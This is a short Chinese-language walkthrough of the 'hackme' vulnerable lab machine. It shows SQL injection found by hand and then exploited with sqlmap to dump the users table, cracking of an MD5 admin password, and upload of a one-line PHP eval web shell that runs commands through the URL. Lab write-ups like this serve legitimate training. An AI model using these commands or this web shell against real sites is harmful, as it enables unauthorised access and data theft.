hackme靶机保姆及攻略
安装靶机
打开靶机,利用kali
输入arp-scan -l扫描主机,第三个
访问靶场
点击注册(账号:admin密码:123456)
注册后去登陆
接下来就是我们熟悉的sql注入,这里我们尝试找到他的闭合点
输入Windows OS'页面没有回显
输入Windows OS'#页面正常
说明闭合点为单引号,开始手工注入。。。手工流程我们已经很了解了
我们为了方便用sqlmap去跑
去抓包,在搜索框中输入1,抓包
全部复制下来,创建1.txt文件,放在1.txt中
打开终端,
输入sqlmap -r 1.txt -dbs
库名为webapphacking,在找表名
输入sqlmap -r 1.txt -D webapphacking --tables
表名是users,再报其中的数据
输入sqlmap -r 1.txt -D webapphacking -T users -dump
一直回车
我们得到了登陆密码,把user是superadmin的密码md5解密一下
在去登录我们就会的到文件上传的界面
上传一个木马文件
创建1.php
内容输入<?php @eval($_GET['a']); ?>
浏览上传
我们再用dirb跑一下网站
我们再去检查一下是否上传木马成功(由于我们写的木马是GET方式提交的,所以直接在网址上尝试执行)
写入成功,已通关